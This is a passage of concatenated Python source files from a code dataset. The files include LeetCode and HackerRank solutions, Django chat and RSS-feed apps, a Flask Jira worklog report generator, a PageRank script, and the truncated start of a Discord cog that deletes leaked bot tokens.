tablestring\n\n def show_tnms(self):\n tnm_show = st.beta_expander(\"Existing TEI NER Entity Mappings\", expanded=True)\n with tnm_show:\n st.markdown(self.build_tnm_tablestring())\n\n def show(self):\n st.latex('\\\\text{\\Huge{TEI NER Entity Mapping}}')\n col1, col2 = st.beta_columns(2)\n with col1:\n self.show_tnms()\n with col2:\n self.show_edit_environment()\n self.show_test_environment()\n","sub_path":"Menu/menu_tei_ner_map.py","file_name":"menu_tei_ner_map.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"297113540","text":"from django.urls import path, include\nfrom .views import *\n\n\nurlpatterns = [\n path(\"login/\", login_page, name=\"login_page\"),\n path(\"register/\", register_page, name=\"register_page\"),\n path(\"logout/\", log_out, name=\"logout\"),\n path(\"profile/\", profile_page, name=\"profile_page\"),\n]","sub_path":"UserProfile/userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610532614","text":"\"\"\"\nhttps://leetcode.com/problems/next-permutation/\nLC031 Next Permutation\nMedium\n\nImplement next permutation, which rearranges numbers into the lexicographically next greater permutation of numbers.\n\nIf such arrangement is not possible, it must rearrange it as the lowest possible order (ie, sorted in ascending order).\nDo not return anything, modify nums in-place instead!\n\nThe replacement must be in-place and use only constant extra memory.\nMeans you cannot list out all permutation and sort it, then find the next one.\n\nCorrect sequence (sorted):\n (1, 2, 3, 4)\n (1, 2, 4, 3)\n (1, 3, 2, 4)\n (1, 3, 4, 2)\n (1, 4, 2, 3)\n (1, 4, 3, 2)\n (2, 1, 3, 4)\n (2, 1, 4, 3)\n (2, 3, 1, 4)\n (2, 3, 4, 1)\n (2, 4, 1, 3)\n (2, 4, 3, 1)\n (3, 1, 2, 4)\n (3, 1, 4, 2)\n (3, 2, 1, 4)\n (3, 2, 4, 1)\n (3, 4, 1, 2)\n (3, 4, 2, 1)\n (4, 1, 2, 3)\n (4, 1, 3, 2)\n (4, 2, 1, 3)\n (4, 2, 3, 1)\n (4, 3, 1, 2)\n (4, 3, 2, 1)\n \"\"\"\n\nfrom typing import *\n\n\nclass Solution_A:\n\n def nextPermutation(self, nums: List[int]) -> None:\n\n if not nums:\n return None\n\n # 从后往前找到第一次出现下降趋势那个元素\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n\n # 先定位first_idx\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n\n if first_idx == -1: # 如果完美倒序上升,则已经逆序排好,直接反转即可\n nums[:] = nums[:][::-1] # nums.reverse()\n else:\n # 定位second_idx\n # 由于尾部已经是逆序排好, 所以从尾部开始倒退,第一个>first_element的元素就是second_element\n while nums[second_idx] <= nums[first_idx]:\n second_idx -= 1\n\n # complete the swap\n nums[first_idx], nums[second_idx] = nums[second_idx], nums[first_idx]\n # reverse element after first_idx\n nums[first_idx + 1:] = nums[first_idx + 1:][::-1]\n\n\n def prevPermutation(self, nums: List[int]) -> None:\n \"\"\"\n This the the oppositve function to find previous permutation\n Only need to simply modify the two places\n \"\"\"\n if not nums:\n return None\n\n # 从后往前找到第一次出现上升趋势那个元素\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n\n # 先定位first_idx\n while first_idx >= 0 and nums[first_idx] <= nums[first_idx + 1]:\n first_idx -= 1 ######## reverse comparison\n\n if first_idx == -1: # 如果完美排序,直接反转即可\n nums[:] = nums[:][::-1] # nums.reverse()\n else:\n # 定位second_idx\n # 由于尾部已经是排序好, 所以从尾部开始倒退,第一个= nums[first_idx]:\n second_idx -= 1 ######## reverse comparison\n\n # complete the swap\n nums[first_idx], nums[second_idx] = nums[second_idx], nums[first_idx]\n # reverse element after first_idx\n nums[first_idx + 1:] = nums[first_idx + 1:][::-1]\n\n\n\nif __name__ == \"__main__\":\n testCase = Solution_A()\n\n a = []\n testCase.nextPermutation(a)\n assert a == [], \"Edge 0\"\n testCase.prevPermutation(a)\n assert a == [], \"Empty prev\"\n\n a = [1]\n testCase.nextPermutation(a)\n assert a == [1], \"Edge 1\"\n testCase.prevPermutation(a)\n assert a == [1], \"Edge 1 prev\"\n\n a = [1, 2]\n testCase.nextPermutation(a)\n assert a == [2, 1], \"Edge 2\"\n testCase.prevPermutation(a)\n assert a == [1, 2], \"Edge 2 prev\"\n\n a = [1, 2, 3]\n testCase.nextPermutation(a)\n assert a == [1, 3, 2], \"Example 1\"\n testCase.prevPermutation(a)\n assert a == [1, 2, 3], \"Example 1 prev\"\n\n a = [3, 2, 1]\n testCase.nextPermutation(a)\n assert a == [1, 2, 3], \"Example 2\"\n testCase.prevPermutation(a)\n assert a == [3, 2, 1], \"Example 2 prev\"\n\n a = [1, 1, 5]\n testCase.nextPermutation(a)\n assert a == [1, 5, 1], \"Example 3\"\n testCase.prevPermutation(a)\n assert a == [1, 1, 5], \"Example 3 prev\"\n\n a = [5, 1, 1]\n testCase.nextPermutation(a)\n assert a == [1, 1, 5], \"Additional 1\"\n testCase.prevPermutation(a)\n assert a == [5, 1, 1], \"Additional 1 prev\"\n\n a = [2, 2, 2]\n testCase.nextPermutation(a)\n assert a == [2, 2, 2], \"Additional 2\"\n testCase.prevPermutation(a)\n assert a == [2, 2, 2], \"Additional 2 prev\"\n\n a = [1, 2, 2, 2]\n testCase.nextPermutation(a)\n assert a == [2, 1, 2, 2], \"Additional 3\"\n testCase.prevPermutation(a)\n assert a == [1, 2, 2, 2], \"Additional 3 prev\"\n\n a = [2, 3, 1]\n testCase.nextPermutation(a)\n assert a == [3, 1, 2], \"Exatra 4\"\n testCase.prevPermutation(a)\n assert a == [2, 3, 1], \"Exatra 4 prev\"\n\n print(\"All passed\")\n","sub_path":"LeetCode/LC031_next_permutation.py","file_name":"LC031_next_permutation.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"326168234","text":"# In this problem, i implemented the code by using the slicing technique\n# it has O(n^2) time complexity, it is not the fastest algorithm to work with 2d arrays (aka matrices), but can still work quite efficiently with large datasets.\n\n# The problem description is: https://www.hackerrank.com/challenges/2d-array/problem\n# All test cases passed\n\nemp = []\nfor i in range(6):\n usIn = list(map(int, input().split()))\n emp.append(usIn)\n\ndef hourglassSum(emp):\n a = len(emp)\n b = len(emp)\n ma =-1000000\n len_emp = len(emp)\n if a < 3 and b < 3:\n return -1\n for i in range(0, a - 2):\n for j in range(0, b - 2):\n suma = (emp[i][j] + emp[i][j+1] + emp[i][j+2]) + (emp[i + 1][j+1]) + (emp[i+2][j] + emp[i+2][j+1] + emp[i+2][j+2])\n\n if suma > ma:\n ma = suma\n else:\n continue\n return ma\n \n# Check Statement:\n# Input: \n# 1 1 1 0 0 0\n# 0 1 0 0 0 0\n# 1 1 1 0 0 0\n# 0 0 2 4 4 0\n# 0 0 0 2 0 0\n# 0 0 1 2 4 0\n\n# Output should be:\n# 19\n","sub_path":"HourGlasses (2D Array-DS)/2D_array_hourGlasses.py","file_name":"2D_array_hourGlasses.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"349096471","text":"\"\"\"Plot to test logscale\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef main():\n fig, ax = plt.subplots(2, 2)\n fig.subplots_adjust(hspace=0.4, wspace=0.4)\n x = np.linspace(1, 1e2)\n y = x ** 2\n\n ax[0, 0].plot(x, y)\n ax[0, 1].semilogx(x, y)\n ax[1, 0].semilogy(x, y)\n ax[1, 1].loglog(x, y)\n return fig\n\nif __name__ == '__main__':\n main()\n plt.show()\n","sub_path":"test_plots/test_logscale.py","file_name":"test_logscale.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"456411424","text":"import sys\nimport numpy as np\n\n#read from command line\nnode_n = int(sys.argv[1]) #size of nodes\nout_p = float(sys.argv[2]) #mod_value to avoid spider trap\n\nM=np.zeros([node_n,node_n], dtype=\"float64\")\n\nM_raw=np.loadtxt(\"./Relation-M.csv\",delimiter=\",\",dtype=\"int\")\nprint(f\"read:\\n{M_raw}\")\n\nfor i in M_raw:\n M[i[1]][i[0]]=1.0\n\nprint(f\"transfer to Adjacency-Matrix:\\n{M}\")\nnp.savetxt('Adjacency-M.csv',M,fmt=\"%d\",delimiter=\",\")\n\nsumM=np.sum(M,axis=0)\nprint(sumM)\n\nfor i in range(node_n):\n for j in range(node_n):\n M[i][j]=1/sumM[j] if M[i][j]==1 else 0\n\nprint(f\"transfer to Value-Matrix:\\n{M}\")\nnp.savetxt('Value-M.csv',M,fmt=\"%f\",delimiter=\",\")\n\nfor i in range(node_n):\n for j in range(node_n):\n M[i][j]=(1-out_p)*M[i][j]+out_p*(1/node_n)\n\nprint(f\"transfer to Power-iterations-Matrix:\\n{M}\")\nnp.savetxt('Power-iterations-M.csv',M,fmt=\"%f\",delimiter=\",\")\n\n","sub_path":"PageRank/method1/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"630254607","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom django.db import models\n\nfrom basedata.models import SingletonModel\n\nfrom django.shortcuts import reverse\nfrom basedata.const import (\n EVENT_REMINDER_CHOICES,\n EVENT_TIME_CHOICES,\n EVENT_ICON_CHOICES,\n EVENT_REPEAT_CHOICES,\n EVENT_PARTICIPANT_TYPES_CHOICES,\n EVENT_PRIORITY_CHOICES\n )\n\n\n\n\n\nclass PlannerConfig(SingletonModel):\n number_of_agenda_items = models.PositiveIntegerField(default=10)\n autogenerate_events_from_models = models.BooleanField(default=False, \n blank=True)\n\nclass Event(models.Model):\n\n date = models.DateField()\n reminder = models.DurationField(choices=EVENT_REMINDER_CHOICES, \n default=datetime.timedelta(seconds=0))\n completed = models.BooleanField(default=False, blank=True)\n completion_time = models.DateTimeField(null=True, blank=True)\n start_time = models.TimeField(choices=EVENT_TIME_CHOICES, default=\"08:00:00\")\n end_time = models.TimeField(choices=EVENT_TIME_CHOICES, default=\"09:00:00\")\n priority = models.CharField(max_length=8, choices=EVENT_PRIORITY_CHOICES, \n default='normal')\n description = models.TextField(blank=True)\n repeat = models.PositiveSmallIntegerField(default=0, choices=EVENT_REPEAT_CHOICES)\n repeat_active = models.BooleanField(default=False, blank=True)\n label = models.CharField(max_length=32, blank=True) \n icon = models.CharField(max_length=32, blank=True, choices=EVENT_ICON_CHOICES)\n owner = models.ForeignKey('employees.User', on_delete=models.SET_NULL, null=True)\n # reminder_notification = models.ForeignKey('messaging.notification', \n # blank=True, null=True, on_delete=models.SET_NULL)\n\n \n\n\n @property\n def participants(self):\n return self.participants.all()\n\n\n def add_participant(self, evt_type, pk):\n from employees.models import Employee\n from inventory.models import Supplier \n \n evt_mapping = {\n 'supplier': 2,\n 'employee': 0,\n 'customer': 1\n }\n evt_type = evt_mapping[evt_type]\n participant = None \n if evt_type == 0:\n participant = EventParticipant.objects.create(\n event=self,\n participant_type = evt_type,\n employee=Employee.objects.get(pk=pk)\n )\n elif evt_type == 1:\n from customers.models import Customer\n \n participant = EventParticipant.objects.create(\n event=self,\n participant_type = evt_type,\n customer=Customer.objects.get(pk=pk)\n )\n elif evt_type == 2:\n participant = EventParticipant.objects.create(\n event=self,\n participant_type = evt_type,\n supplier= Supplier.objects.get(pk=pk)\n )\n else:\n raise Exception('no type was specified')\n\n return participant\n \n \n def complete(self):\n self.completed = True\n self.completion_time = datetime.datetime.now()\n self.save()\n\n @property\n def repeat_string(self):\n mapping = dict(EVENT_REPEAT_CHOICES)\n return mapping[self.repeat]\n\n def repeat_on_date(self, date):\n # eliminate past dates at the begining\n if self.date > date:\n return False \n\n if self.repeat == 0:\n return False\n\n elif self.repeat == 1:\n return True\n\n elif self.repeat == 2:\n if self.date.weekday() == date.weekday():\n return True\n return False\n\n elif self.repeat == 3:\n if self.date.day == date.day:\n return True\n return False\n\n elif self.repeat == 4:\n if self.date.day == date.day and self.date.month == date.month:\n return True\n return False\n\n return False\n\n def __str__(self):\n return self.label\n\n\nclass EventParticipant(models.Model):\n\n participant_type = models.PositiveSmallIntegerField(\n choices=EVENT_PARTICIPANT_TYPES_CHOICES\n )\n employee = models.ForeignKey('employees.Employee', \n on_delete=models.SET_NULL, null=True, blank=True)\n customer = models.ForeignKey('customers.Customer', \n on_delete=models.SET_NULL, null=True, blank=True)\n supplier = models.ForeignKey('inventory.Supplier', \n on_delete=models.SET_NULL, null=True, blank=True)\n event = models.ForeignKey(\n 'Event', \n on_delete=models.SET_NULL,\n null=True,\n related_name='participants'\n )\n\n\n def __str__(self):\n if self.participant_type == 0:\n return f\"Employee: {str(self.employee)}\"\n if self.participant_type == 1:\n return f\"Customer: {str(self.customer)}\"\n if self.participant_type == 2:\n return f\"Vendor: {str(self.supplier)}\"\n\n @property\n def participant_pk(self):\n if self.participant_type == 0:\n return self.employee.pk\n if self.participant_type == 1:\n return self.customer.pk\n if self.participant_type == 2:\n return self.supplier.pk\n ","sub_path":"soapsales/event/models/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"115385401","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate\nfrom feeds.feed_management import add_feed, feed_adder_func\nfrom django.contrib import messages\nfrom feeds.query_parser import *\nfrom .models import FeedUser, Feed, Source\nfrom .form import *\nimport json\n\n\ndef logout(request):\n if request.method == \"POST\":\n logout(request)\n return redirect('logout')\n return render(request, 'landing/logout.html', locals())\n\n\ndef home(request):\n if request.user.is_authenticated:\n user = request.user.username\n username = request.user.username\n try:\n FeedUser.objects.get(user=user)\n except:\n FeedUser.objects.create(user=user)\n else:\n return redirect('/registration')\n user = FeedUser.objects.get(user=request.user.username)\n query = Feed.objects.filter(user=user)\n titles = []\n i = 0\n for o in query:\n titles.append(feed_title(get_feed(query[i])))\n i += 1\n try:\n tryes = get_feed(query[0])\n feed = json.dumps(titles)\n except:\n feed = \"It seems there are no feeds.\"\n return render(request, 'landing/home.html', locals())\n\n\ndef current_feed(request):\n print(request.GET.get('source'))\n http = Source.objects.get(title=request.GET.get('source')).http\n number = request.GET.get('number')\n feed = feed_content(http, number)\n title = request.GET.get('title')\n href = feed_href(http, number)\n return render(request, 'landing/current_feed.html', locals())\n\n\ndef login(request):\n if request.user.is_authenticated:\n return redirect('/home')\n return render(request, 'landing/signIn.html', locals())\n\n\ndef landing(request):\n if request.user.is_authenticated:\n return redirect('/home')\n form = SignUpForm(request.POST or None)\n if request.method == \"POST\" and form.is_valid():\n new_form = form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request)\n return redirect('/signIn')\n return render(request, 'landing/landing.html', locals())\n\n\ndef new_feed(request):\n user = FeedUser.objects.get(user=request.user.username)\n query = Feed.objects.filter(user=user)\n https = []\n for q in query.values_list('feed'):\n i = 0\n for c in q:\n https.append(c)\n\n old_titles = []\n for h in https:\n old_titles.append(Source.objects.get(http=h).title)\n\n titles = Source.objects.values_list('title')\n new_https = Source.objects.values_list('http')\n new_titles = []\n for t in titles:\n i = 0\n for c in t:\n if c in old_titles:\n pass\n else:\n new_titles.append(c)\n\n new_form = NewFeedForm(questions=new_titles)\n if request.method == 'POST' and 'new' in request.POST:\n new_form = NewFeedForm(request.POST, questions=new_titles)\n if new_form.is_valid():\n for item in new_form.cleaned_data:\n if new_form.cleaned_data[item]:\n new_feed = Source.objects.get(title=item).http\n o = Feed.objects.create(user=user, feed=new_feed)\n o.save()\n return redirect(\"/new_feed\")\n else:\n print(\"smth wrong\")\n\n old_form = OldFeedForm(questions=old_titles)\n if request.method == 'POST' and 'old' in request.POST:\n old_form = NewFeedForm(request.POST, questions=old_titles)\n if old_form.is_valid():\n for item in old_form.cleaned_data:\n if old_form.cleaned_data[item]:\n old_feed = Source.objects.get(title=item).http\n o = Feed.objects.get(user=user, feed=old_feed)\n o.delete()\n return redirect(\"/new_feed\")\n else:\n print(\"smth wrong\")\n\n return render(request, 'landing/new_feed.html', locals())\n\n\ndef feed_adder(request):\n message = \"\"\n if request.user.username != 'admin':\n redirect('/home')\n form = FeedAddForm()\n if request.method == \"POST\" and 'add_feed' in request.POST:\n form = FeedAddForm(request.POST)\n if form.is_valid():\n source = form.cleaned_data.get('source')\n try:\n title = get_feed_title(source)\n try:\n feed_adder_func(source, title)\n message = 'Feed added!'\n print(message)\n except:\n message = 'Feed already exists!'\n print(message)\n except:\n message = 'Invalid feed source!'\n print(message)\n else:\n print('Form is not valid')\n else:\n form = FeedAddForm()\n message = 'Something wrong!'\n print(message)\n\n return render(request, 'landing/feed_adder.html', locals())\n","sub_path":"landing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"501699849","text":"import getpass\nimport textwrap\nimport argparse\nimport os\nimport socket\nfrom flask import Flask, make_response, send_file, render_template\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib import colors\nfrom reportlab.lib.pagesizes import landscape, letter, inch\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, Table\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom jira import JIRA\n\nif 'JIRA_SERVER' in os.environ:\n server = os.environ['JIRA_SERVER']\nelse:\n server = input(\"Enter server (e.g. jira.example.com): \")\n\nif 'JIRA_USER' in os.environ:\n username = os.environ['JIRA_USER']\nelse:\n username = input(\"Username (e.g. joe.doe): \")\n\nif 'JIRA_USERPASSWORD' in os.environ:\n password = os.environ['JIRA_USERPASSWORD']\nelse:\n password = getpass.getpass(\"Password: \")\n\nif 'JIRA_WORKLOG_FROM_DATE' in os.environ:\n from_date = datetime.strptime(os.environ['JIRA_WORKLOG_FROM_DATE'], '%Y-%m-%d').date()\nelse:\n from_date = datetime.strptime(input(\"From date (e.g. 2016-12-01): \"), '%Y-%m-%d').date()\n\nif 'JIRA_WORKLOG_TO_DATE' in os.environ:\n to_date = datetime.strptime(os.environ['JIRA_WORKLOG_TO_DATE'], '%Y-%m-%d').date()\nelse:\n to_date = datetime.strptime(input(\"To date (e.g. 2016-12-31): \"),'%Y-%m-%d').date()\n\nif 'JIRA_PROJECTID' in os.environ:\n project = os.environ['JIRA_PROJECTID']\nelse:\n project = input(\"JIRA Project ID: \")\n\nif 'DAY_LOG_GOAL' in os.environ:\n day_log_goal = os.environ['DAY_LOG_GOAL']\nelse:\n day_log_goal = 7\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--log', nargs='?', help='log')\nargs = parser.parse_args()\n\nfastdebug = 0\nhtml = 1\n\nDATE_FORMAT = \"%d/%m/%y\"\n\napp = Flask(__name__)\n\ndef get_worklog(assignee):\n\n if fastdebug != 1:\n jira = JIRA('https://{0}'.format(server),\n basic_auth=(username, password))\n jql = 'timespent > 0 AND project = %s ORDER BY updated DESC' % project \n issues = jira.search_issues(jql)\n \n assignees = dict()\n worklogs = []\n date_worklogs = defaultdict(list)\n issue_worklogs = defaultdict(list)\n issues_data = {}\n if fastdebug != 1:\n for issue in issues:\n issues_data[issue.key] = issue\n for w in jira.worklogs(issue.key):\n started = datetime.strptime(w.started[:-5],\n '%Y-%m-%dT%H:%M:%S.%f')\n # author = w.author\n # if author.name != assignee:\n #\n # this is probably crude and not very future-proofed, but it\n # works against my JIRA cloud instance, where the above does not\n author = w.raw['author']['name']\n assignees[author] =+ 1\n if author != assignee:\n continue\n\n if not (from_date <= started.date() <= to_date):\n continue\n\n spent = w.timeSpentSeconds / 3600\n\n worklog = {\n \"started\": started, \"spent\": spent, \"author\": author,\n \"issue\": issue,\n }\n worklogs.append(worklog)\n date_worklogs[started.date()].append(worklog)\n issue_worklogs[issue.key].append(worklog)\n\n ts = [\n ('GRID', (0, 0), (-1, -1), 0.5, colors.lightgrey),\n ('ALIGN', (0, 0), (-1, -1), 'CENTER'),\n ('FONT', (0, 0), (-1, -1), 'DejaVuSans', 8, 8),\n ('ALIGN', (0, 0), (0, -1), 'LEFT'),\n ('FONT', (0, 0), (0, -1), 'DejaVuSans-Bold', 8, 8),\n ('FONT', (0, 0), (-1, 0), 'DejaVuSans-Bold', 8, 8),\n ]\n\n total_spent = 0.0\n\n day_spent = ['Total'] # key is a column number\n def cell_value(col, row, date, issue):\n nonlocal total_spent\n\n is_weekend = date.weekday() >= 5 if date else None\n if is_weekend:\n ts.append(('BACKGROUND', (col, 0), (col, -1), colors.whitesmoke))\n\n if row == 0 and date:\n return date.strftime(\"%d\\n{0}\".format(date.strftime(\"%a\")[0]))\n if col == 0 and issue:\n return textwrap.fill(\"{0} - {1}\".format(issue, issues_data[issue].fields.summary),50)\n if date and issue:\n task_total = sum(map(lambda w: w['spent'],\n filter(lambda w: w['issue'].key == issue,\n date_worklogs[date])))\n # this probably shouldn't be put here as it means it is computed a\n # lot more times than need be\n day_spent[col] += task_total\n total_spent += task_total\n return \"{:.1f}\".format(task_total) if task_total else \"\"\n return \"\"\n\n dates = get_dates_in_range(from_date, to_date)\n day_spent = ['Total'] + [0] * len(dates)\n data = [\n [\n cell_value(col, row, date, issue)\n for col, date in enumerate([None] + dates)\n ]\n for row, issue in enumerate([None] + list(issue_worklogs.keys()))\n ]\n\n if fastdebug == 1:\n print(data)\n data = [['', '08\\nM', '09\\nT', '10\\nW', '11\\nT', '12\\nF', '13\\nS', '14\\nS', '15\\nM', '16\\nT', '17\\nW', '18\\nT', '19\\nF', '20\\nS', '21\\nS', '22\\nM', '23\\nT', '24\\nW', '25\\nT', '26\\nF'], ['TICKET-1', '', '', '', '', '1.0', '', '', '', '', '', '', '', '', '', '', '', '', '', ''], ['TICKET-2', '', '', '', '', '', '', '', '0.2', '', '', '', '', '', '', '', '', '', '', ''], ['TICKET-3', '', '6.0', '', '', '6.0', '3.0', '2.0', '7.0', '', '', '', '', '', '', '', '', '', '', ''], ['TICKET-4', '', '', '', '8.0', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']]\n day_spent = ['Total', 0, 6.0, 0, 8.0, 7.0, 3.0, 2.0, 7.166666666666667, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n assignees = {\"bill\": 1, \"ted\": 2}\n\n day_spent = list(map(lambda x: round(x,1) if isinstance(x, float) else x, day_spent))\n data.append(day_spent)\n\n if html != 1:\n register_fonts()\n doc = SimpleDocTemplate('%s.pdf' % assignee, pagesize=landscape(letter))\n\n elements = []\n\n stylesheet = getSampleStyleSheet()\n p = Paragraph('''\n \n Jira Tasks Report ({0}-{1})\n '''.format(\n from_date.strftime(DATE_FORMAT),\n to_date.strftime(DATE_FORMAT)), stylesheet[\"BodyText\"])\n elements.append(p)\n\n cw = [None] + [0.2*inch] * (len(data[0]) - 1)\n t = Table(data, style=ts, colWidths=cw)\n elements.append(t)\n\n p = Paragraph('''\n \n Total Hours: {:.2f}\n '''.format(total_spent), stylesheet[\"BodyText\"])\n elements.append(p)\n\n doc.build(elements)\n print('Done')\n return doc\n\n # now the html way...\n table = html_table(data)\n # other assignees\n aprint = map(lambda x: ''+str(x)+'',\n list(assignees.keys()))\n aprint = \", \".join(aprint)\n return render_template('output.html',\n name=assignee,\n table=table,\n total=total_spent,\n assignees=aprint)\n\n#\n# build our own html table that puts emphasis on the ticket names, the day\n# totals, and colors any column with more than 7 hours worked as green\n# ...input is a 2 dimensional table\n#\ngoodcolor=' style=\"background-color:#00FF00\"'\nwecolor=' style=\"background-color:whitesmoke\"'\ndef html_table(data):\n output = \"\"\n lastrow = len(data)-1\n for row, column in enumerate(data):\n if row == 1:\n output += \"\\n\\n\"\n output += \"\"\n for column, cell in enumerate(data[row]):\n # emphasis on first column and last row\n if column == 0 or row == lastrow:\n cell = \"\"+str(cell)+\"\"\n\n color=\"\"\n if column != 0 and data[lastrow][column] >= day_log_goal:\n color=goodcolor\n elif column != 0 and data[0][column].endswith('S'):\n color=wecolor\n \n if row == 0:\n output += \"\"+str(cell)+\"\"\n else:\n output += \"\"+str(cell)+\"\"\n\n output += \"\\n\"\n output += \"\\n\\n
\\n\"\n return output\n \ndef get_dates_in_range(from_date, to_date):\n dates = []\n current_date = from_date\n while True:\n dates.append(current_date)\n if current_date >= to_date:\n break\n current_date += timedelta(days=1)\n return dates\n\n\ndef register_fonts():\n pdfmetrics.registerFont(\n TTFont('DejaVuSans', '/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf',\n 'UTF-8'))\n pdfmetrics.registerFont(\n TTFont('DejaVuSans-Bold',\n '/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf',\n 'UTF-8'))\n\n\n@app.route(\"/worklog/\")\ndef worklog(assignee):\n if html == 1:\n return get_worklog(assignee)\n\n get_worklog(assignee)\n return send_file('../%s.pdf' % assignee)\n\n@app.route(\"/worklog\")\n@app.route(\"/worklog/\")\ndef worklogentry():\n return '''\nHello, World!\n'''\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"325541335","text":"from django.contrib import admin\nfrom django.conf.urls import url\nfrom django.utils.safestring import mark_safe\nfrom django.core.urlresolvers import reverse\nfrom .models import Room, Message\nfrom django.shortcuts import render\n\n\n\n@admin.register(Room)\nclass RoomAdmin(admin.ModelAdmin):\n list_display = ('__str__', 'bot', 'bot_position', 'bot_reply_after')\n list_filter = ('chat_type', 'created_at')\n readonly_fields = ('users', 'bot', 'users_linked', 'messages')\n prepopulated_fields = {\"label\": (\"name\",)}\n\n def get_queryset(self, request):\n qs = super(RoomAdmin, self).get_queryset(request)\n return qs.select_related('bot')\n\n def users_linked(self, obj):\n\n return mark_safe(', '.join(['{}'.format(\n reverse(\"admin:user_user_change\", args=(x,)), x) for x in obj.users]))\n\n\n users_linked.short_description = 'users'\n\n\n def messages(self, obj):\n\n return mark_safe('
'.join(['{} : {}'.format(x.owner, x.text) for x in obj.messages.all().select_related('owner')]))\n\n\n messages.short_description = 'messages'\n\n@admin.register(Message)\nclass MessageAdmin(admin.ModelAdmin):\n search_fields = ('text', )\n\n\n list_display = ('id', 'owner_link', 'text', 'room_link')\n\n readonly_fields = ('owner', 'room', 'owner_link', 'room_link')\n\n def get_queryset(self, request):\n qs = super(MessageAdmin, self).get_queryset(request)\n return qs.filter(owner__bot=None).select_related('room', 'owner')\n\n def get_urls(self):\n urls = super(MessageAdmin, self).get_urls()\n my_urls = [\n url(r'^profile/(?P[0-9]+)$', self.profile),\n\n ]\n return my_urls + urls\n\n def profile(self, request, user_id):\n from chat.notifications import build_initial_notifications\n from user.models import User\n user = User.objects.get(id=user_id)\n build_initial_notifications(user, {'rooms': []})\n\n return render(\n request,\n 'chat/admin/profile.html',\n {\n 'title': 'Profile',\n 'user_id': 'user_id',\n\n\n\n })\n\n def owner_link(self, obj):\n return mark_safe('{}'.format(\n reverse(\"admin:user_user_change\", args=(obj.owner.id,)),\n obj.owner\n ))\n owner_link.short_description = 'user'\n\n def room_link(self, obj):\n return mark_safe('{}'.format(\n reverse(\"admin:chat_room_change\", args=(obj.room.id,)),\n obj.room\n ))\n room_link.short_description = 'room'\n\n\n","sub_path":"chat/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"572526602","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\n\ndef read_image(image_path):\n \"\"\"Leer una imagen y devolver un vector de la imagen\"\"\"\n img = cv2.imread(image_path)\n reshape_value = 1\n\n for i in img.shape:\n reshape_value *= i\n\n return img.reshape((1, reshape_value)), img.shape\n\n\ndef show_image(image):\n \"\"\" Muestra una sola imagen\"\"\"\n img=cv2.imread(image)\n plt.imshow(img)\n plt.xticks([]), plt.yticks([])\n plt.show()\n\n\ndef show_images(a, b):\n \"\"\" Mostrar dos imágenes una al lado de la otra \"\"\"\n imga=cv2.imread(a)\n imgb=cv2.imread(b)\n plot_image = np.concatenate((imga, imgb), axis=1)\n plt.imshow(plot_image)\n plt.xticks([]), plt.yticks([])\n plt.show()\n","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"408336505","text":"import base64\nimport binascii\nimport logging\nimport re\nimport struct\nfrom datetime import datetime\n\nfrom discord import Colour, Message\nfrom discord.ext.commands import Bot\nfrom discord.utils import snowflake_time\n\nfrom bot.cogs.modlog import ModLog\nfrom bot.constants import Channels, Colours, Event, Icons\n\nlog = logging.getLogger(__name__)\n\nDELETION_MESSAGE_TEMPLATE = (\n \"Hey {mention}! I noticed you posted a seemingly valid Discord API \"\n \"token in your message and have removed your message to prevent abuse. \"\n \"We recommend regenerating your token regardless, which you can do here: \"\n \"\\n\"\n \"Feel free to re-post it with the token removed. \"\n \"If you believe this was a mistake, please let us know!\"\n)\nDISCORD_EPOCH_TIMESTAMP = datetime(2017, 1, 